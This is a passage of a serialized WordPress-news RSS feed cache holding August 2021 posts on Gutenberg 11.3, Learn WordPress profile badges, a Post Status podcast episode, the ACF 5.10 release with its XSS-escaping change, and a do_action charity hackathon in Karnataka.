href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s main (trunk) branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<h2>Gutenberg 11.3 released</h2>\n\n\n\n<p><strong>Vicente Canales</strong> from Chile, wrangled the release of Gutenberg 11.3 and you can read <a href=\"https://make.wordpress.org/core/2021/08/18/whats-new-in-gutenberg-11-3-18-august/\">What’s new in Gutenberg 11.3? (18 August)</a> in his release post. </p>\n\n\n\n<p><strong>Justin Tadlock</strong> tested the new Gutenberg plugin version and has the details: <a href=\"https://wptavern.com/gutenberg-11-3-introduces-dimensions-panel-adds-button-padding-support-and-speeds-up-the-inserter\">Gutenberg 11.3 Introduces Dimensions Panel, Adds Button Padding Support, and Speeds Up the Inserter</a></p>\n\n\n\n<p>In the new Episode of the <strong><a href=\"https://gutenbergtimes.com/podcast/changelog-50-preliminary-roadmap-to-wordpress-5-9/\">Gutenberg Changelog #50</a>, Grzegorz (Greg) Ziolkowski </strong>and I discuss the preliminary roadmap to WordPress 5.9, Gutenberg 11.3 release and Navigation Screen and Block. </p>\n\n\n\n<p>As mentioned, <strong>Gutenberg 11.4</strong> is already in the works. For testing purposes, the <a href=\"https://github.com/WordPress/gutenberg/releases/tag/v11.4.0-rc.1\">release candidate 11.4 RC</a> is available for download. Final release is schedule for Wednesday, September 1st. </p>\n\n\n\n\n<p> <strong>Subscribe to the&nbsp;<a href=\"https://gutenbergtimes.com/podcast/\">Gutenberg Changelog</a>&nbsp;podcast </strong><br />?️&nbsp;<a href=\"https://open.spotify.com/show/620NwVKQJGdTupy36zYxvg?mc_cid=4b6c9f88fe\">Spotify</a>&nbsp;|&nbsp;<a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9ndXRlbmJlcmd0aW1lcy5jb20vZmVlZC9wb2RjYXN0\">Google</a>&nbsp;|&nbsp;<a href=\"https://podcasts.apple.com/us/podcast/gutenberg-changelog/id1469294475\">iTunes</a>&nbsp;|&nbsp;<a href=\"https://pca.st/podcast/f8445ec0-7508-0137-f267-1d245fc5f9cf\">PocketCasts</a>&nbsp;|&nbsp;<a href=\"https://www.stitcher.com/show/gutenberg-changelog\">Stitcher</a>&nbsp;|<br />?️&nbsp;<a href=\"https://www.podbean.com/podcast-detail/chi7j-9904a/Gutenberg-Changelog-Podcast\">Pod Bean</a>&nbsp;|&nbsp;<a href=\"https://castbox.fm/channel/Gutenberg-Changelog-id2173375\">CastBox</a>&nbsp;|&nbsp;<a href=\"https://www.podchaser.com/podcasts/gutenberg-changelog-878239/\">Podchaser</a>&nbsp;|&nbsp;<a href=\"https://gutenbergtimes.com/feed/podcast\">RSS Feed</a>&nbsp;</p>\n\n\n\n<img />\n\n\n\n\n<h2>Navigation Blocks and Screen updates</h2>\n\n\n\n<p>The Gutenberg developers working on the <a href=\"https://make.wordpress.org/core/2021/08/25/hallway-hangout-summary-compare-and-contrast-the-navigation-screens/\"><strong>Navigation Blocks and Screen met for a Hallway Hangout</strong> </a>to discuss the current issues. (Github Tracking Issue). The  goal of the discussion was to  identify those that need to be resolved to take the block-based Navigation feature out of the experimental state and get it ready for the merge into WordPress Core, possibly for 5.9 in December. <strong>Dave Smith</strong> posted links to the recording and relevant issue on the <a href=\"https://make.wordpress.org/core/2021/08/25/hallway-hangout-summary-compare-and-contrast-the-navigation-screens/\">Make/Core blog.</a> </p>\n\n\n\n<h2>Building Blocks</h2>\n\n\n\n<p><strong>Rich Tabor</strong> updated his tutorial <strong><a href=\"https://richtabor.com/block-styles/\">How to add and remove Gutenberg block styles with Javascript</a>.</strong> &#8220;And while it is relatively simple to add block styles using PHP, removing them is <strong>not</strong> quite as easy — especially block styles added by WordPress core (or any added client-side). Enter JavaScript… and I promise, it’s not as daunting as you might think.&#8221;</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Ryan Welcher </strong>explains <a href=\"https://ryanwelcher.com/2021/08/requesting-data-in-gutenberg-with-getentityrecords/\"><strong>how to request data with the <code>getEntityRecord</code> selector</strong></a> and expands on some details and use cases. Welcher provides a series of query examples and then walks you through the method on how to create a loading state and update the queries. </p>\n\n\n\n<h2>Block Editor for site implementors and content creators</h2>\n\n\n\n<p><strong>Justin Tadlock</strong> explored the new plugin <a href=\"https://wordpress.org/plugins/attributes-for-blocks/\">Block Attributes</a>, that empowers users to add attributes to blocks via the advanced section in the sidebar. This is handy when you need to add a click event or aria-labels to blocks. Tadlocks tutorial explain the how:<a href=\"https://wptavern.com/adding-custom-html-attributes-with-the-block-attributes-plugin\"> <strong>Adding Custom HTML Attributes With the Block Attributes Plugin</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Jamie Marsland</strong> of PootlePress (WooCommerce Blocks) wrote a tutorial on <strong><a href=\"https://www.pootlepress.com/2021/08/how-to-create-an-industry-news-page-with-the-gutenberg-block-editor/\">How to create an Industry News Page with the Gutenberg Block Editor</a>.</strong> Marsland walks you through the usage and display options of the RSS block.  </p>\n\n\n\n<h2>Theme development for Gutenberg</h2>\n\n\n\n<p><strong>Matias Ventura</strong>, the &#8216;spark of Gutenberg&#8217; gave in his post <a href=\"https://matiasventura.com/post/the-theme-json-horizon/\"><strong>The Theme.json horizon </strong></a>a bird&#8217;s-eye view on the broader impact and opportunities the Theme.json file provides for the WordPress ecosystem. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Tammie Lister</strong> shared her <strong><a href=\"https://ephemeralthemes.com/2021/08/09/fun-with-group-block-borders/\">fun with group block borders</a></strong>, with instructions on how to control borders via theme.json. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://twitter.com/fwazeter\">Frank Wazeter</a> </strong>explored a <a href=\"https://medium.com/@wazeter/wordpress-theme-development-how-to-make-5-8-mimic-gutenberg-plugin-block-theme-architecture-f2ad5a454231\"><strong>way to use the new theme features of WordPress 5.8 without depending on the Gutenberg plugin</strong></a> to be present. Wazeter wrote: &#8220;This code shows how a WordPress theme can support and mimic Gutenberg Plugin’s templating system for the block editor/template editor, while not having a dependency on the Gutenberg Plugin itself. &#8220;.</p>\n\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p class=\"has-text-align-center\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\">Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 28 Aug 2021 11:59:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: Proposal for Adding Badges and Other ‘Learner Achievements’ to WordPress Profiles\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=121902\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:223:\"https://wptavern.com/proposal-for-adding-badges-and-other-learner-achievements-to-wordpress-profiles?utm_source=rss&utm_medium=rss&utm_campaign=proposal-for-adding-badges-and-other-learner-achievements-to-wordpress-profiles\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5711:\"<p class=\"has-drop-cap\">In December 2020, WordPress <a href=\"https://wptavern.com/learn-wordpress-platform-launches-with-free-courses-workshops-and-lesson-plans\">launched its new &ldquo;Learn&rdquo; platform</a> with free courses, workshops, and lesson plans. Since then, the Training Team has continued adding more material. The <a href=\"https://make.wordpress.org/training/2021/08/10/proposal-learner-achievements-on-profiles/\">latest proposal </a>is an open discussion for the community on adding participatory badges for completing coursework.</p>\n\n\n\n<p>&ldquo;I&rsquo;d like to nail down what kind of thing we would like to see regarding recognising learner achievements on profiles,&rdquo; wrote WordPress community manager Hugh Lashbrooke in the announcement earlier this month.</p>\n\n\n\n<p>The proposal, which now has a <a href=\"https://github.com/WordPress/learn/issues/228\">GitHub ticket</a>, includes showing the following on a user&rsquo;s WordPress.org profile page:</p>\n\n\n\n<ul><li>A course&rsquo;s completion in the activity stream.</li><li>The user&rsquo;s average grade from Learn WordPress.</li><li>A new &ldquo;Learning&rdquo; tab for displaying completed courses with dates and the possibility of individual completed lessons, relevant grades, and other learning data.</li><li>A new &ldquo;Learner&rdquo; badge for anyone who has completed one course.</li></ul>\n\n\n\n<p>Currently, there are only two <a href=\"https://learn.wordpress.org/courses/\">courses available</a>. &ldquo;That is changing as we develop new content,&rdquo; wrote Lashbrooke in the post. &ldquo;So my hope is that we will have these rewards in place now, and as content is created, the rewards will flow naturally.&rdquo;</p>\n\n\n\n<p>One downside to the proposal may be publicly showing a user&rsquo;s grades. &ldquo;I&rsquo;d be against showing the learner&rsquo;s average grade publicly because it could lead to anxiety, stress, etc., and maybe even stop some people from participating in the courses,&rdquo; wrote Stephen Cronin in the comments. &ldquo;Eg: &lsquo;What if I only get a C, will anyone take me seriously? Will it harm my chances of getting a job in the WP space?&rsquo; etc. Some people will thrive on that sort of competition, some people &hellip; not so much. And I feel like we should be as inclusive as possible.&rdquo;</p>\n\n\n\n<p>Lashbrooke responded that showing grades could be an opt-in feature. However, I would question why it would be necessary to show grades at all. <em>Bragging rights?</em> Maybe. If we could somehow make it shareable via social media, it might be a fun way to get more people to participate.</p>\n\n\n\n<p>Several people in the comments were encouraged by the idea of social sharing. Adam Warner even proposed adding the Learn badges to the oEmbed WordPress block, making it easy for users to share their accomplishments on their sites.</p>\n\n\n\n<p>However, the first step should be to provide badges for completing a course. It is an easy win and could be automated.</p>\n\n\n\n<p>Most user profile badges are for direct contributions to the project, such as writing code or working on a team. However, at least some user-based participatory badges are available already. For example, there is a &ldquo;Test Contributor&rdquo; badge for providing feedback on calls for testing.</p>\n\n\n\n<p>One side advantage of a Learn achievement system could be for employers who are looking through an applicant&rsquo;s history. It may help potential employees show off their competency in specific areas of the WordPress platform.</p>\n\n\n\n<p>Courtney Engle Robertson, Web Design and Developer Advocate at GoDaddy, questioned Matt Mullenweg during 2020&rsquo;s State of the Word Q&amp;A session on the role of the Learn platform as it pertains to the job market.</p>\n\n\n\n<p>Mullenweg said the first step is organizing the platform and making high-quality educational material available. However, he seemed open to the idea of having a self or administered certification down the line. It would allow people to show that they have completed or tested out of a course.</p>\n\n\n\n<p>&ldquo;It wouldn&rsquo;t be a perfect system, but it could be a nice way for people to learn more about WordPress,&rdquo; he said. &ldquo;And, hopefully, as they go through, since WordPress is open-source, improve the materials as we go through it, both from the point of view of making it more intuitive or easier to understand and also translating, as well. Because there is a huge demand for WordPress really all over the world now.&rdquo;</p>\n\n\n\n<p>View the clip below from the <a href=\"https://wordpress.tv/2020/12/17/matt-mullenweg-2020-state-of-the-word-qa/\">State of the Word Q&amp;A</a>:</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<p>&ldquo;As someone who hires WordPress professionals, I would love to have a request in the job application to link up their WP profile so we can see competency through that learning platform,&rdquo; commented Chris Badgett, the founder and CEO of LifterLMS, on the proposal.</p>\n\n\n\n<p>He also agreed with Mullenweg that people should be able to test out of a course. It would not make sense for those who have already acquired specific skills or knowledge to go through the motions of completing coursework they are already proficient in.</p>\n\n\n\n<p>&ldquo;Creating quizzes or &lsquo;post tests&rsquo; in the LMS with a standard minimum passing requirement to earn the achievement badge would help fulfill this,&rdquo; he said.</p>\n\n\n\n<p>For now, some simple gamification via profile badges could boost participation and, perhaps, get more people involved in contributing to the Learn platform. This could also be the first step toward a WordPress certification system.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 28 Aug 2021 00:39:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"Post Status: Post Status Excerpt (No. 22) — Dealing With Developer Overload: Organization\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=85744\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://poststatus.com/excerpt/22/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3678:\"<h2 id=\"h-we-can-be-organized-in-how-we-multitask\">We Can Be Organized In How We Multitask.</h2>\n\n\n\n<p class=\"has-drop-cap\">In this episode, David and Cory have a conversation about another way to prevent Developer Overload: organization. Cory shares how he benefited from a mentor, while David feels that documentation, commenting code, and following some best practices can help reduce anxiety overall — if you can convince yourself to adopt new habits. This show is worth a listen just for Cory\'s &#8220;going on a hike&#8221; metaphor.</p>\n\n\n\n<p><strong>Also covered in this episode: </strong>Cory encourages David to take <a href=\"https://secure.kolbe.com/k2/show_takeIndex/indexType_A\" target=\"_blank\" rel=\"noreferrer noopener\">the Kolbe A Index</a> test.</p>\n\n\n\n\n\n\n\n<p class=\"has-background\">Every week Post Status Excerpt will brief you on important WordPress news — in about 15 minutes or less! Learn what\'s new in WordPress in a flash. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/26a1.png\" alt=\"⚡\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\" target=\"_blank\" rel=\"noreferrer noopener\">Browse our archives</a>, and don’t forget to subscribe via <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\" target=\"_blank\" rel=\"noreferrer noopener\">iTunes</a>, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\" target=\"_blank\" rel=\"noreferrer noopener\">Google Podcasts</a>, <a href=\"https://www.youtube.com/c/PostStatus\" target=\"_blank\" rel=\"noreferrer noopener\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\" target=\"_blank\" rel=\"noreferrer noopener\">Stitcher</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\" target=\"_blank\" rel=\"noreferrer noopener\">Simplecast</a>, or <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f3a7.png\" alt=\"?\" class=\"wp-smiley\" /></p>\n\n\n\n<h3 id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f517.png\" alt=\"?\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul><li><a href=\"https://twitter.com/dimensionmedia\" target=\"_blank\" rel=\"noreferrer noopener\">David Bisset (Twitter)</a></li><li><a href=\"https://twitter.com/corymiller303\" target=\"_blank\" rel=\"noreferrer noopener\">Cory Miller (Twitter)</a></li><li><a href=\"https://twitter.com/post_status\" target=\"_blank\" rel=\"noreferrer noopener\">Post Status (Twitter)</a></li><li><a href=\"http://kolbe.com\"></a><a target=\"_blank\" href=\"http://kolbe.com/\" rel=\"noreferrer noopener\">kolbe.com</a></li><li><a target=\"_blank\" href=\"http://strengthsfinder.com/\" rel=\"noreferrer noopener\">strengthsfinder.com</a></li><li><a target=\"_blank\" href=\"https://poststatus.com/get-hired/\" rel=\"noreferrer noopener\">Get Hired</a></li></ul>\n\n\n\n<h3><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f64f.png\" alt=\"?\" class=\"wp-smiley\" /> Sponsor: <a href=\"https://poststat.us/sandhills\" target=\"_blank\" rel=\"noreferrer noopener sponsored nofollow\">Sandhills Development</a></h3>\n\n\n\n<p>No matter what you\'re working on with your WordPress website, <strong>Sandhills Development</strong> has a tool that can help you. Sell digital products with <strong>Easy Digital Downloads</strong>. Use <strong>AffiliateWP</strong> as your affiliate marketing solution. <strong>Sugar Calendar</strong> is event management made easy. And <strong>WP Simple Pay</strong> is a lightweight Stripe payments plugin. Craft superior experiences with the ingenuity of Sandhills’ plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 Aug 2021 22:13:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"David Bisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: ACF 5.10 Introduces Block API v2 Support, Block Preloading, and Security Improvements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=121854\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:231:\"https://wptavern.com/acf-5-10-introduces-block-api-v2-support-block-preloading-and-security-improvements?utm_source=rss&utm_medium=rss&utm_campaign=acf-5-10-introduces-block-api-v2-support-block-preloading-and-security-improvements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4176:\"<p>Advanced Custom Fields (ACF) has released <a href=\"https://www.advancedcustomfields.com/blog/acf-5-10-release-html-escaping-blocks-api-v2-block-preloading-and-more/\">version 5.10</a>, the first major release since the plugin was <a href=\"https://wptavern.com/delicious-brains-acquires-advanced-custom-fields-plugin\">acquired by Delicious Brains</a>. It introduces several new features that were previously experimental, closing out tickets that were started by previous owner Elliot Condon.</p>\n\n\n\n<p>The release enables HTML escaping by default, which helps prevent Cross-Site Scripting (XSS) attacks. It runs content rendered by ACF through the WordPress&nbsp;<code>wp_kses()</code>&nbsp;function. There was a little confusion about how this works and the release post has been <a href=\"https://twitter.com/wp_acf/status/1430906074593304589\">updated</a> to clarify:</p>\n\n\n\n<p>&ldquo;It&rsquo;s important to note that this only affects content rendered by ACF in your WordPress dashboard or any front-end forms rendered through&nbsp;<code>acf_form()</code>,&rdquo; Iain Poulson said. &ldquo;This will not affect field values loaded through API functions such as&nbsp;<code>get_field()</code>&nbsp;and&nbsp;<code>the_field()</code>. We don&rsquo;t make any assumptions about where you are using your field values within your theme and do not escape to them as a result.&rdquo;</p>\n\n\n\n<p>Version 5.10 also introduces support for the WordPress Blocks API v2 for ACF blocks. <a href=\"https://make.wordpress.org/core/2020/11/18/block-api-version-2/\">WordPress 5.6</a> came with a new Block API that makes it easier for theme and plugin developers to style the block content with more consistent results matching the front end. The ACF team has created a <a href=\"https://www.advancedcustomfields.com/resources/block-api-v2/\">Block API v2 help doc</a> with examples that help developers update their blocks and make use of the new block filters included in the update.</p>\n\n\n\n<p>Other features introduced in this release include block preloading turned on by default, a new full-height setting for blocks, opacity support for the color-picker, and many bug fixes. Next up on the roadmap for the plugin is adding WordPress REST API support to ACF field groups.</p>\n\n\n\n<p>&ldquo;As API-powered JavaScript front-ends become more and more popular in the WordPress space, it&rsquo;s clear that many of our customers want this functionality included in ACF core,&rdquo; Poulson said.</p>\n\n\n\n<p>&ldquo;We also plan to improve the performance of the plugin and work on other quality of life features. Now that our development team has a solid handle on the codebase and the release process, we can start working on these more complicated but long-requested features.&rdquo;</p>\n\n\n\n<p>Shortly after the acquisition, Delicious Brains representatives published a pinned <a href=\"https://wordpress.org/support/topic/free-support-expectations-and-response-times-7/\">thread</a> in the forum, clarifying expectations for free support and response times. The official support forum for both free and PRO users can be found at <a href=\"https://support.advancedcustomfields.com/\">support.advancedcustomfields.com</a>, which is more active than the WordPress.org forums. Since the plugin is more developer-focused, the team is taking a looser approach to support by giving the community a place to help each other:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>We rarely provide support in either forum. The exception is after a major release, when we keep an eye on both forums to spot any problems caused by the release.</p><p>The primary purpose of both forums is for people in the WordPress community who are having trouble with Advanced Custom Fields to help each other. Response times can range from a few days to a few weeks and will likely be from a non-developer. We jump in now and then when the description sounds suspiciously like a bug.&nbsp;</p></blockquote>\n\n\n\n<p>The release of version 5.10 is a good sign that ACF will continue to make progress under its new ownership and a reassuring milestone for the small minority of users who were unsure about the plugin&rsquo;s future. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 27 Aug 2021 16:54:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"WordPress Foundation: do_action Karnataka 2021: A report\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpressfoundation.org/?p=194408\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpressfoundation.org/2021/do_action-karnataka-2021-a-report/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7725:\"<p class=\"has-drop-cap\">WordPress Community members in the state of Karnataka, India organized a do_action charity hackathon from 07 to 15 August 2021. The event, which was supported by 12 volunteers, helped create websites for 3 non-profits. do_action Karnataka was held completely online due to the COVID-19 pandemic, and it concluded symbolically on August 15th 2021 — the 75th Independence Day of India. This is the second do_action Hackathon in Karnataka — the first one being <a href=\"https://doaction.org/event/bengaluru-2019/\">do_action Bengaluru</a>, which was held in 2019.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\"><a href=\"https://doaction.org/event/karnataka-2021/\">Karnataka 2021</a></blockquote>\n</div>\n\n\n\n<p>Efforts behind <a href=\"https://doaction.org/event/karnataka-2021/\">do_action Karnataka</a> kicked off three months prior, in April 2021. <a href=\"https://profiles.wordpress.org/nsuresha/\">N Suresha</a>, <a href=\"https://profiles.wordpress.org/freewebmentor/\">Prem Tiwari</a>, <a href=\"https://www.linkedin.com/in/ucriyaz/?originalSubdomain=in\">UC Riyaz</a>, <a href=\"https://twitter.com/sagarvora786?lang=en\">Sagar Vora</a>, <a href=\"https://www.linkedin.com/in/venkatesh-kumar-s-r-945b8821/\">SR Venkatesh</a>, and <a href=\"https://profiles.wordpress.org/yoga1103/\">Yogesh Londhe</a> (myself) from the WordPress Community of Karnataka, joined hands to support local non-profits by helping them build websites. The following non-profits signed up for our hackathon:&nbsp;</p>\n\n\n\n<ul><li><strong>Luv Kush Foster Home:</strong> A foster home that aims to care for animals in need</li><li><strong>Vridhi Foundation:</strong> which aims to support the education of underprivileged children</li><li><strong>Peacespark Foundation:</strong> Welfare of women and children</li></ul>\n\n\n\n<p>12 volunteers immediately signed up to build websites for these non-profits. Not everyone could participate due to personal challenges related to COVID-19, but the teams worked hard to complete the work within the stipulated time. As a result of all that hard work, two non-profit sites were launched, and one is in the pipeline!</p>\n\n\n\n<p><strong>Peacespark Foundation:</strong> <a href=\"https://www.peacespark.org/\">https://www.peacespark.org/</a></p>\n\n\n\n<a href=\"https://i2.wp.com/wordpressfoundation.org/content/uploads/2021/08/image.png?ssl=1\"><img /></a>A screenshot of the Peacespark Foundation website created by the do_action Karnataka 2021 team.\n\n\n\n<p>The website of Peacespark Foundation was built by <a href=\"https://www.linkedin.com/in/venkatesh-kumar-s-r-945b8821/\">SR Venkatesh</a> (project manager) and <a href=\"https://profiles.wordpress.org/harishanker\">Hari Shanker</a> (content writer). Venkatesh collected all the content and the photos from the non-profit, and he was also in constant communication with the team. He also single-handedly designed and developed the website for the team! Since the content manager volunteer could not join on time, Hari stepped in to prepare the content for the site. As a result, the site was ready well within the deadline, and the non-profit was happy and grateful!</p>\n\n\n\n<p><strong>Vridhi Foundation: </strong><a 